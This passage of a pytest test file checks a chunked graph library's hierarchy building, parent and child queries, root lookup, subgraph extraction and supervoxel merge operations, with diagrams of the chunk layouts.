children = column.deserialize(row[column.key][0].value)
test_ace = np.array([to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0)], dtype=np.uint64)
assert len(atomic_cross_edge_dict[2]) == 1
assert test_ace in atomic_cross_edge_dict[2]
assert len(children) == 1 and to_label(cgraph, 1, 0, 0, 0, 0) in children
# to_label(cgraph, 2, 1, 0, 0, 1)
assert serializers.serialize_uint64(to_label(cgraph, 2, 1, 0, 0, 1)) in res.rows
row = res.rows[serializers.serialize_uint64(to_label(cgraph, 2, 1, 0, 0, 1))].cells[cgraph.family_id]
atomic_cross_edge_dict = cgraph.get_atomic_cross_edge_dict(to_label(cgraph, 2, 1, 0, 0, 1))
column = column_keys.Hierarchy.Child
children = column.deserialize(row[column.key][0].value)
test_ace = np.array([to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0)], dtype=np.uint64)
assert len(atomic_cross_edge_dict[2]) == 1
assert test_ace in atomic_cross_edge_dict[2]
assert len(children) == 1 and to_label(cgraph, 1, 1, 0, 0, 0) in children
# Check for the one Level 3 node that should have been created. This one combines the two
# connected components of Level 2
# to_label(cgraph, 3, 0, 0, 0, 1)
assert serializers.serialize_uint64(to_label(cgraph, 3, 0, 0, 0, 1)) in res.rows
row = res.rows[serializers.serialize_uint64(to_label(cgraph, 3, 0, 0, 0, 1))].cells[cgraph.family_id]
atomic_cross_edge_dict = cgraph.get_atomic_cross_edge_dict(to_label(cgraph, 3, 0, 0, 0, 1))
column = column_keys.Hierarchy.Child
children = column.deserialize(row[column.key][0].value)
for aces in atomic_cross_edge_dict.values():
assert len(aces) == 0
assert len(children) == 2 and to_label(cgraph, 2, 0, 0, 0, 1) in children and to_label(cgraph, 2, 1, 0, 0, 1) in children
# Make sure there are not any more entries in the table
assert len(res.rows) == 2 + 2 + 1 + 3 + 1
@pytest.mark.timeout(30)
def test_build_single_edge_and_single_across_edge(self, gen_graph):
"""
Create graph with edge between RG supervoxels 1 and 2 (same chunk)
and edge between RG supervoxels 1 and 3 (neighboring chunks)
┌─────┬─────┐
│ A¹ │ B¹ │
│ 2━1━┿━━3 │
│ │ │
└─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Chunk A
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0), inf)])
# Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), inf)])
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]))
res = cgraph.table.read_rows()
res.consume_all()
# Check for the three RG-to-CG mappings:
# assert chunkedgraph.serialize_uint64(1) in res.rows
# row = res.rows[chunkedgraph.serialize_uint64(1)].cells[cgraph.family_id]
# assert np.frombuffer(row[b'cg_id'][0].value, np.uint64)[0] == to_label(cgraph, 1, 0, 0, 0, 0)
# assert chunkedgraph.serialize_uint64(2) in res.rows
# row = res.rows[chunkedgraph.serialize_uint64(2)].cells[cgraph.family_id]
# assert np.frombuffer(row[b'cg_id'][0].value, np.uint64)[0] == to_label(cgraph, 1, 0, 0, 0, 1)
# assert chunkedgraph.serialize_uint64(3) in res.rows
# row = res.rows[chunkedgraph.serialize_uint64(3)].cells[cgraph.family_id]
# assert np.frombuffer(row[b'cg_id'][0].value, np.uint64)[0] == to_label(cgraph, 1, 1, 0, 0, 0)
# Check for the three original Level 1 CG supervoxels
# to_label(cgraph, 1, 0, 0, 0, 0)
assert serializers.serialize_uint64(to_label(cgraph, 1, 0, 0, 0, 0)) in res.rows
atomic_node_info = cgraph.get_atomic_node_info(to_label(cgraph, 1, 0, 0, 0, 0))
atomic_affinities = atomic_node_info[column_keys.Connectivity.Affinity]
atomic_partners = atomic_node_info[column_keys.Connectivity.Partner]
parents = atomic_node_info[column_keys.Hierarchy.Parent]
assert len(atomic_partners) == 2 and to_label(cgraph, 1, 0, 0, 0, 1) in atomic_partners and to_label(cgraph, 1, 1, 0, 0, 0) in atomic_partners
assert len(atomic_affinities) == 2
if atomic_partners[0] == to_label(cgraph, 1, 0, 0, 0, 1):
assert atomic_affinities[0] == 0.5 and atomic_affinities[1] == inf
else:
assert atomic_affinities[0] == inf and atomic_affinities[1] == 0.5
assert len(parents) == 1 and parents[0] == to_label(cgraph, 2, 0, 0, 0, 1)
# to_label(cgraph, 1, 0, 0, 0, 1)
assert serializers.serialize_uint64(to_label(cgraph, 1, 0, 0, 0, 1)) in res.rows
atomic_node_info = cgraph.get_atomic_node_info(to_label(cgraph, 1, 0, 0, 0, 1))
atomic_affinities = atomic_node_info[column_keys.Connectivity.Affinity]
atomic_partners = atomic_node_info[column_keys.Connectivity.Partner]
parents = atomic_node_info[column_keys.Hierarchy.Parent]
assert len(atomic_partners) == 1 and atomic_partners[0] == to_label(cgraph, 1, 0, 0, 0, 0)
assert len(atomic_affinities) == 1 and atomic_affinities[0] == 0.5
assert len(parents) == 1 and parents[0] == to_label(cgraph, 2, 0, 0, 0, 1)
# to_label(cgraph, 1, 1, 0, 0, 0)
assert serializers.serialize_uint64(to_label(cgraph, 1, 1, 0, 0, 0)) in res.rows
atomic_node_info = cgraph.get_atomic_node_info(to_label(cgraph, 1, 1, 0, 0, 0))
atomic_affinities = atomic_node_info[column_keys.Connectivity.Affinity]
atomic_partners = atomic_node_info[column_keys.Connectivity.Partner]
parents = atomic_node_info[column_keys.Hierarchy.Parent]
assert len(atomic_partners) == 1 and atomic_partners[0] == to_label(cgraph, 1, 0, 0, 0, 0)
assert len(atomic_affinities) == 1 and atomic_affinities[0] == inf
assert len(parents) == 1 and parents[0] == to_label(cgraph, 2, 1, 0, 0, 1)
# Check for the two Level 2 nodes that should have been created. Since Level 2 has the same
# dimensions as Level 1, we also expect them to be in different chunks
# to_label(cgraph, 2, 0, 0, 0, 1)
assert serializers.serialize_uint64(to_label(cgraph, 2, 0, 0, 0, 1)) in res.rows
row = res.rows[serializers.serialize_uint64(to_label(cgraph, 2, 0, 0, 0, 1))].cells[cgraph.family_id]
atomic_cross_edge_dict = cgraph.get_atomic_cross_edge_dict(to_label(cgraph, 2, 0, 0, 0, 1))
column = column_keys.Hierarchy.Child
children = column.deserialize(row[column.key][0].value)
test_ace = np.array([to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0)], dtype=np.uint64)
assert len(atomic_cross_edge_dict[2]) == 1
assert test_ace in atomic_cross_edge_dict[2]
assert len(children) == 2 and to_label(cgraph, 1, 0, 0, 0, 0) in children and to_label(cgraph, 1, 0, 0, 0, 1) in children
# to_label(cgraph, 2, 1, 0, 0, 1)
assert serializers.serialize_uint64(to_label(cgraph, 2, 1, 0, 0, 1)) in res.rows
row = res.rows[serializers.serialize_uint64(to_label(cgraph, 2, 1, 0, 0, 1))].cells[cgraph.family_id]
atomic_cross_edge_dict = cgraph.get_atomic_cross_edge_dict(to_label(cgraph, 2, 1, 0, 0, 1))
column = column_keys.Hierarchy.Child
children = column.deserialize(row[column.key][0].value)
test_ace = np.array([to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0)], dtype=np.uint64)
assert len(atomic_cross_edge_dict[2]) == 1
assert test_ace in atomic_cross_edge_dict[2]
assert len(children) == 1 and to_label(cgraph, 1, 1, 0, 0, 0) in children
# Check for the one Level 3 node that should have been created. This one combines the two
# connected components of Level 2
# to_label(cgraph, 3, 0, 0, 0, 1)
assert serializers.serialize_uint64(to_label(cgraph, 3, 0, 0, 0, 1)) in res.rows
row = res.rows[serializers.serialize_uint64(to_label(cgraph, 3, 0, 0, 0, 1))].cells[cgraph.family_id]
atomic_cross_edge_dict = cgraph.get_atomic_cross_edge_dict(to_label(cgraph, 3, 0, 0, 0, 1))
column = column_keys.Hierarchy.Child
children = column.deserialize(row[column.key][0].value)
for ace in atomic_cross_edge_dict.values():
assert len(ace) == 0
assert len(children) == 2 and to_label(cgraph, 2, 0, 0, 0, 1) in children and to_label(cgraph, 2, 1, 0, 0, 1) in children
# Make sure there are not any more entries in the table
assert len(res.rows) == 3 + 2 + 1 + 3 + 1
@pytest.mark.timeout(30)
def test_build_big_graph(self, gen_graph):
"""
Create graph with RG nodes 1 and 2 in opposite corners of the largest possible dataset
┌─────┐ ┌─────┐
│ A¹ │ ... │ Z¹ │
│ 1 │ │ 2 │
│ │ │ │
└─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=10)
# Preparation: Build Chunk A
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[])
# Preparation: Build Chunk Z
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 255, 255, 255, 0)],
edges=[])
cgraph.add_layer(3, np.array([[0x00, 0x00, 0x00]]))
cgraph.add_layer(3, np.array([[0xFF, 0xFF, 0xFF]]))
cgraph.add_layer(4, np.array([[0x00, 0x00, 0x00]]))
cgraph.add_layer(4, np.array([[0x7F, 0x7F, 0x7F]]))
cgraph.add_layer(5, np.array([[0x00, 0x00, 0x00]]))
cgraph.add_layer(5, np.array([[0x3F, 0x3F, 0x3F]]))
cgraph.add_layer(6, np.array([[0x00, 0x00, 0x00]]))
cgraph.add_layer(6, np.array([[0x1F, 0x1F, 0x1F]]))
cgraph.add_layer(7, np.array([[0x00, 0x00, 0x00]]))
cgraph.add_layer(7, np.array([[0x0F, 0x0F, 0x0F]]))
cgraph.add_layer(8, np.array([[0x00, 0x00, 0x00]]))
cgraph.add_layer(8, np.array([[0x07, 0x07, 0x07]]))
cgraph.add_layer(9, np.array([[0x00, 0x00, 0x00]]))
cgraph.add_layer(9, np.array([[0x03, 0x03, 0x03]]))
cgraph.add_layer(10, np.array([[0x00, 0x00, 0x00], [0x01, 0x01, 0x01]]))
res = cgraph.table.read_rows()
res.consume_all()
# cgraph.logger.debug(len(res.rows))
# for row_key in res.rows.keys():
# cgraph.logger.debug(row_key)
# cgraph.logger.debug(cgraph.get_chunk_layer(chunkedgraph.deserialize_uint64(row_key)))
# cgraph.logger.debug(cgraph.get_chunk_coordinates(chunkedgraph.deserialize_uint64(row_key)))
assert serializers.serialize_uint64(to_label(cgraph, 1, 0, 0, 0, 0)) in res.rows
assert serializers.serialize_uint64(to_label(cgraph, 1, 255, 255, 255, 0)) in res.rows
assert serializers.serialize_uint64(to_label(cgraph, 10, 0, 0, 0, 1)) in res.rows
assert serializers.serialize_uint64(to_label(cgraph, 10, 0, 0, 0, 2)) in res.rows
@pytest.mark.timeout(30)
def test_double_chunk_creation(self, gen_graph):
"""
No connection between 1, 2 and 3
┌─────┬─────┐
│ A¹ │ B¹ │
│ 1 │ 3 │
│ 2 │ │
└─────┴─────┘
"""
cgraph = gen_graph(n_layers=4)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 1),
to_label(cgraph, 1, 0, 0, 0, 2)],
edges=[],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 1)],
edges=[],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]),
time_stamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]),
time_stamp=fake_timestamp)
cgraph.add_layer(4, np.array([[0, 0, 0]]),
time_stamp=fake_timestamp)
assert len(cgraph.range_read_chunk(layer=3, x=0, y=0, z=0)) == 6
assert len(cgraph.range_read_chunk(layer=4, x=0, y=0, z=0)) == 3
assert cgraph.get_chunk_layer(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1))) == 4
assert cgraph.get_chunk_layer(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 2))) == 4
assert cgraph.get_chunk_layer(cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 1))) == 4
lvl_3_child_ids = [cgraph.get_segment_id(cgraph.read_node_id_row(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1)), column_keys.Hierarchy.Child)[0].value),
cgraph.get_segment_id(cgraph.read_node_id_row(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 2)), column_keys.Hierarchy.Child)[0].value),
cgraph.get_segment_id(cgraph.read_node_id_row(cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 1)), column_keys.Hierarchy.Child)[0].value)]
assert 4 in lvl_3_child_ids
assert 5 in lvl_3_child_ids
assert 6 in lvl_3_child_ids
class TestGraphSimpleQueries:
"""
┌─────┬─────┬─────┐ L X Y Z S L X Y Z S L X Y Z S L X Y Z S
│ A¹ │ B¹ │ C¹ │ 1: 1 0 0 0 0 ─── 2 0 0 0 1 ─── 3 0 0 0 1 ─── 4 0 0 0 1
│ 1 │ 3━2━┿━━4 │ 2: 1 1 0 0 0 ─┬─ 2 1 0 0 1 ─── 3 0 0 0 2 ─┬─ 4 0 0 0 2
│ │ │ │ 3: 1 1 0 0 1 ─┘ │
└─────┴─────┴─────┘ 4: 1 2 0 0 0 ─── 2 2 0 0 1 ─── 3 1 0 0 1 ─┘
"""
@pytest.mark.timeout(30)
def test_get_parent_and_children(self, gen_graph_simplequerytest):
cgraph = gen_graph_simplequerytest
children10000 = cgraph.get_children(to_label(cgraph, 1, 0, 0, 0, 0))
children11000 = cgraph.get_children(to_label(cgraph, 1, 1, 0, 0, 0))
children11001 = cgraph.get_children(to_label(cgraph, 1, 1, 0, 0, 1))
children12000 = cgraph.get_children(to_label(cgraph, 1, 2, 0, 0, 0))
parent10000 = cgraph.get_parent(to_label(cgraph, 1, 0, 0, 0, 0), get_only_relevant_parent=True, time_stamp=None)
parent11000 = cgraph.get_parent(to_label(cgraph, 1, 1, 0, 0, 0), get_only_relevant_parent=True, time_stamp=None)
parent11001 = cgraph.get_parent(to_label(cgraph, 1, 1, 0, 0, 1), get_only_relevant_parent=True, time_stamp=None)
parent12000 = cgraph.get_parent(to_label(cgraph, 1, 2, 0, 0, 0), get_only_relevant_parent=True, time_stamp=None)
children20001 = cgraph.get_children(to_label(cgraph, 2, 0, 0, 0, 1))
children21001 = cgraph.get_children(to_label(cgraph, 2, 1, 0, 0, 1))
children22001 = cgraph.get_children(to_label(cgraph, 2, 2, 0, 0, 1))
parent20001 = cgraph.get_parent(to_label(cgraph, 2, 0, 0, 0, 1), get_only_relevant_parent=True, time_stamp=None)
parent21001 = cgraph.get_parent(to_label(cgraph, 2, 1, 0, 0, 1), get_only_relevant_parent=True, time_stamp=None)
parent22001 = cgraph.get_parent(to_label(cgraph, 2, 2, 0, 0, 1), get_only_relevant_parent=True, time_stamp=None)
children30001 = cgraph.get_children(to_label(cgraph, 3, 0, 0, 0, 1))
children30002 = cgraph.get_children(to_label(cgraph, 3, 0, 0, 0, 2))
children31001 = cgraph.get_children(to_label(cgraph, 3, 1, 0, 0, 1))
parent30001 = cgraph.get_parent(to_label(cgraph, 3, 0, 0, 0, 1), get_only_relevant_parent=True, time_stamp=None)
parent30002 = cgraph.get_parent(to_label(cgraph, 3, 0, 0, 0, 2), get_only_relevant_parent=True, time_stamp=None)
parent31001 = cgraph.get_parent(to_label(cgraph, 3, 1, 0, 0, 1), get_only_relevant_parent=True, time_stamp=None)
children40001 = cgraph.get_children(to_label(cgraph, 4, 0, 0, 0, 1))
children40002 = cgraph.get_children(to_label(cgraph, 4, 0, 0, 0, 2))
parent40001 = cgraph.get_parent(to_label(cgraph, 4, 0, 0, 0, 1), get_only_relevant_parent=True, time_stamp=None)
parent40002 = cgraph.get_parent(to_label(cgraph, 4, 0, 0, 0, 2), get_only_relevant_parent=True, time_stamp=None)
# (non-existing) Children of L1
assert np.array_equal(children10000, []) is True
assert np.array_equal(children11000, []) is True
assert np.array_equal(children11001, []) is True
assert np.array_equal(children12000, []) is True
# Parent of L1
assert parent10000 == to_label(cgraph, 2, 0, 0, 0, 1)
assert parent11000 == to_label(cgraph, 2, 1, 0, 0, 1)
assert parent11001 == to_label(cgraph, 2, 1, 0, 0, 1)
assert parent12000 == to_label(cgraph, 2, 2, 0, 0, 1)
# Children of L2
assert len(children20001) == 1 and to_label(cgraph, 1, 0, 0, 0, 0) in children20001
assert len(children21001) == 2 and to_label(cgraph, 1, 1, 0, 0, 0) in children21001 and to_label(cgraph, 1, 1, 0, 0, 1) in children21001
assert len(children22001) == 1 and to_label(cgraph, 1, 2, 0, 0, 0) in children22001
# Parent of L2
assert parent20001 == to_label(cgraph, 3, 0, 0, 0, 1) and parent21001 == to_label(cgraph, 3, 0, 0, 0, 2) or \
parent20001 == to_label(cgraph, 3, 0, 0, 0, 2) and parent21001 == to_label(cgraph, 3, 0, 0, 0, 1)
assert parent22001 == to_label(cgraph, 3, 1, 0, 0, 1)
# Children of L3
assert len(children30001) == 1 and len(children30002) == 1 and len(children31001) == 1
assert to_label(cgraph, 2, 0, 0, 0, 1) in children30001 and to_label(cgraph, 2, 1, 0, 0, 1) in children30002 or \
to_label(cgraph, 2, 0, 0, 0, 1) in children30002 and to_label(cgraph, 2, 1, 0, 0, 1) in children30001
assert to_label(cgraph, 2, 2, 0, 0, 1) in children31001
# Parent of L3
assert parent30001 == parent31001 or parent30002 == parent31001
assert (parent30001 == to_label(cgraph, 4, 0, 0, 0, 1) and parent30002 == to_label(cgraph, 4, 0, 0, 0, 2)) or \
(parent30001 == to_label(cgraph, 4, 0, 0, 0, 2) and parent30002 == to_label(cgraph, 4, 0, 0, 0, 1))
# Children of L4
if len(children40001) == 1:
assert parent20001 in children40001
assert len(children40002) == 2 and parent21001 in children40002 and parent22001 in children40002
elif len(children40001) == 2:
assert parent21001 in children40001 and parent22001 in children40001
assert len(children40002) == 1 and parent20001 in children40002
# (non-existing) Parent of L4
assert parent40001 is None
assert parent40002 is None
# # Children of (non-existing) L5
# with pytest.raises(IndexError):
# cgraph.get_children(to_label(cgraph, 5, 0, 0, 0, 1))
# # Parent of (non-existing) L5
# with pytest.raises(IndexError):
# cgraph.get_parent(to_label(cgraph, 5, 0, 0, 0, 1), get_only_relevant_parent=True, time_stamp=None)
children2_separate = cgraph.get_children([to_label(cgraph, 2, 0, 0, 0, 1),
to_label(cgraph, 2, 1, 0, 0, 1),
to_label(cgraph, 2, 2, 0, 0, 1)])
assert len(children2_separate) == 3
assert to_label(cgraph, 2, 0, 0, 0, 1) in children2_separate and \
np.all(np.isin(children2_separate[to_label(cgraph, 2, 0, 0, 0, 1)], children20001))
assert to_label(cgraph, 2, 1, 0, 0, 1) in children2_separate and \
np.all(np.isin(children2_separate[to_label(cgraph, 2, 1, 0, 0, 1)], children21001))
assert to_label(cgraph, 2, 2, 0, 0, 1) in children2_separate and \
np.all(np.isin(children2_separate[to_label(cgraph, 2, 2, 0, 0, 1)], children22001))
children2_combined = cgraph.get_children([to_label(cgraph, 2, 0, 0, 0, 1),
to_label(cgraph, 2, 1, 0, 0, 1),
to_label(cgraph, 2, 2, 0, 0, 1)], flatten=True)
assert len(children2_combined) == 4 and \
np.all(np.isin(children20001, children2_combined)) and \
np.all(np.isin(children21001, children2_combined)) and \
np.all(np.isin(children22001, children2_combined))
@pytest.mark.timeout(30)
def test_get_root(self, gen_graph_simplequerytest):
cgraph = gen_graph_simplequerytest
root10000 = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0),
time_stamp=None)
root11000 = cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0),
time_stamp=None)
root11001 = cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 1),
time_stamp=None)
root12000 = cgraph.get_root(to_label(cgraph, 1, 2, 0, 0, 0),
time_stamp=None)
with pytest.raises(Exception) as e:
cgraph.get_root(0)
assert (root10000 == to_label(cgraph, 4, 0, 0, 0, 1) and
root11000 == root11001 == root12000 == to_label(
cgraph, 4, 0, 0, 0, 2)) or \
(root10000 == to_label(cgraph, 4, 0, 0, 0, 2) and
root11000 == root11001 == root12000 == to_label(
cgraph, 4, 0, 0, 0, 1))
@pytest.mark.timeout(30)
def test_get_subgraph_nodes(self, gen_graph_simplequerytest):
cgraph = gen_graph_simplequerytest
root1 = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0))
root2 = cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0))
lvl1_nodes_1 = cgraph.get_subgraph_nodes(root1)
lvl1_nodes_2 = cgraph.get_subgraph_nodes(root2)
assert len(lvl1_nodes_1) == 1
assert len(lvl1_nodes_2) == 3
assert to_label(cgraph, 1, 0, 0, 0, 0) in lvl1_nodes_1
assert to_label(cgraph, 1, 1, 0, 0, 0) in lvl1_nodes_2
assert to_label(cgraph, 1, 1, 0, 0, 1) in lvl1_nodes_2
assert to_label(cgraph, 1, 2, 0, 0, 0) in lvl1_nodes_2
lvl2_nodes_1 = cgraph.get_subgraph_nodes(root1, return_layers=[2])
lvl2_nodes_2 = cgraph.get_subgraph_nodes(root2, return_layers=[2])
assert len(lvl2_nodes_1) == 1
assert len(lvl2_nodes_2) == 2
assert to_label(cgraph, 2, 0, 0, 0, 1) in lvl2_nodes_1
assert to_label(cgraph, 2, 1, 0, 0, 1) in lvl2_nodes_2
assert to_label(cgraph, 2, 2, 0, 0, 1) in lvl2_nodes_2
lvl3_nodes_1 = cgraph.get_subgraph_nodes(root1, return_layers=[3])
lvl3_nodes_2 = cgraph.get_subgraph_nodes(root2, return_layers=[3])
assert len(lvl3_nodes_1) == 1
assert len(lvl3_nodes_2) == 2
assert to_label(cgraph, 3, 0, 0, 0, 1) in lvl3_nodes_1
assert to_label(cgraph, 3, 0, 0, 0, 2) in lvl3_nodes_2
assert to_label(cgraph, 3, 1, 0, 0, 1) in lvl3_nodes_2
lvl4_node = cgraph.get_subgraph_nodes(root1, return_layers=[4])
assert len(lvl4_node) == 1
assert root1 in lvl4_node
layers = cgraph.get_subgraph_nodes(root2, return_layers=[1, 4])
assert len(layers) == 2 and 1 in layers and 4 in layers
assert len(layers[4]) == 1 and root2 in layers[4]
assert len(layers[1]) == 3
assert to_label(cgraph, 1, 1, 0, 0, 0) in layers[1]
assert to_label(cgraph, 1, 1, 0, 0, 1) in layers[1]
assert to_label(cgraph, 1, 2, 0, 0, 0) in layers[1]
lvl2_nodes = cgraph.get_subgraph_nodes(root2, return_layers=[2],
bounding_box=[[1, 0, 0], [2, 1, 1]],
bb_is_coordinate=False)
assert len(lvl2_nodes) == 1
assert to_label(cgraph, 2, 1, 0, 0, 1) in lvl2_nodes
lvl2_parent = cgraph.get_parent(to_label(cgraph, 1, 1, 0, 0, 0))
lvl1_nodes = cgraph.get_subgraph_nodes(lvl2_parent)
assert len(lvl1_nodes) == 2
assert to_label(cgraph, 1, 1, 0, 0, 0) in lvl1_nodes
assert to_label(cgraph, 1, 1, 0, 0, 1) in lvl1_nodes
@pytest.mark.timeout(30)
def test_get_subgraph_edges(self, gen_graph_simplequerytest):
cgraph = gen_graph_simplequerytest
root1 = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0))
root2 = cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0))
edges, affinities, areas = cgraph.get_subgraph_edges(root1)
assert len(edges) == 0 and len(affinities) == 0 and len(areas) == 0
edges, affinities, areas = cgraph.get_subgraph_edges(root2)
assert [to_label(cgraph, 1, 1, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 1)] in edges or \
[to_label(cgraph, 1, 1, 0, 0, 1),
to_label(cgraph, 1, 1, 0, 0, 0)] in edges
assert [to_label(cgraph, 1, 1, 0, 0, 0),
to_label(cgraph, 1, 2, 0, 0, 0)] in edges or \
[to_label(cgraph, 1, 2, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 0)] in edges
# assert len(edges) == 2 and len(affinities) == 2 and len(areas) == 2
lvl2_parent = cgraph.get_parent(to_label(cgraph, 1, 1, 0, 0, 0))
edges, affinities, areas = cgraph.get_subgraph_edges(lvl2_parent)
assert [to_label(cgraph, 1, 1, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 1)] in edges or \
[to_label(cgraph, 1, 1, 0, 0, 1),
to_label(cgraph, 1, 1, 0, 0, 0)] in edges
assert [to_label(cgraph, 1, 1, 0, 0, 0),
to_label(cgraph, 1, 2, 0, 0, 0)] in edges or \
[to_label(cgraph, 1, 2, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 0)] in edges
assert len(edges) == 2
@pytest.mark.timeout(30)
def test_get_subgraph_nodes_bb(self, gen_graph_simplequerytest):
cgraph = gen_graph_simplequerytest
bb = np.array([[1, 0, 0], [2, 1, 1]], dtype=int)  # np.int was removed in NumPy 1.24; the builtin int is the drop-in replacement
bb_coord = bb * cgraph.chunk_size
childs_1 = cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 1)), bounding_box=bb)
childs_2 = cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 1)), bounding_box=bb_coord, bb_is_coordinate=True)
assert np.all(~(np.sort(childs_1) - np.sort(childs_2)))
@pytest.mark.timeout(30)
def test_get_atomic_partners(self, gen_graph_simplequerytest):
cgraph = gen_graph_simplequerytest
class TestGraphMerge:
@pytest.mark.timeout(30)
def test_merge_pair_same_chunk(self, gen_graph):
"""
Add edge between existing RG supervoxels 1 and 2 (same chunk)
Expected: Same (new) parent for RG 1 and 2 on Layer two
┌─────┐ ┌─────┐
│ A¹ │ │ A¹ │
│ 1 2 │ => │ 1━2 │
│ │ │ │
└─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=2)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[],
timestamp=fake_timestamp)
# Merge
new_root_ids = cgraph.add_edges("Jane Doe", [to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 0, 0, 0, 0)], affinities=0.3)
assert len(new_root_ids) == 1
new_root_id = new_root_ids[0]
# Check
assert cgraph.get_parent(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_id
assert cgraph.get_parent(to_label(cgraph, 1, 0, 0, 0, 1)) == new_root_id
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert partners[0] == to_label(cgraph, 1, 0, 0, 0, 1) and affinities[0] == np.float32(0.3)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 1))
assert partners[0] == to_label(cgraph, 1, 0, 0, 0, 0) and affinities[0] == np.float32(0.3)
leaves = np.unique(cgraph.get_subgraph_nodes(new_root_id))
assert len(leaves) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 0, 0, 0, 1) in leaves
@pytest.mark.timeout(30)
def test_merge_pair_neighboring_chunks(self, gen_graph):
"""
Add edge between existing RG supervoxels 1 and 2 (neighboring chunks)
┌─────┬─────┐ ┌─────┬─────┐
│ A¹ │ B¹ │ │ A¹ │ B¹ │
│ 1 │ 2 │ => │ 1━━┿━━2 │
│ │ │ │ │ │
└─────┴─────┘ └─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
# Merge
new_root_ids = cgraph.add_edges("Jane Doe", [to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0)], affinities=0.3)
assert len(new_root_ids) == 1
new_root_id = new_root_ids[0]
# Check
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_id
assert cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0)) == new_root_id
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert partners[0] == to_label(cgraph, 1, 1, 0, 0, 0) and affinities[0] == np.float32(0.3)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 1, 0, 0, 0))
assert partners[0] == to_label(cgraph, 1, 0, 0, 0, 0) and affinities[0] == np.float32(0.3)
leaves = np.unique(cgraph.get_subgraph_nodes(new_root_id))
assert len(leaves) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 1, 0, 0, 0) in leaves
@pytest.mark.timeout(30)
def test_merge_pair_disconnected_chunks(self, gen_graph):
"""
Add edge between existing RG supervoxels 1 and 2 (disconnected chunks)
┌─────┐ ┌─────┐ ┌─────┐ ┌─────┐
│ A¹ │ ... │ Z¹ │ │ A¹ │ ... │ Z¹ │
│ 1 │ │ 2 │ => │ 1━━┿━━━━━┿━━2 │
│ │ │ │ │ │ │ │
└─────┘ └─────┘ └─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=9)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
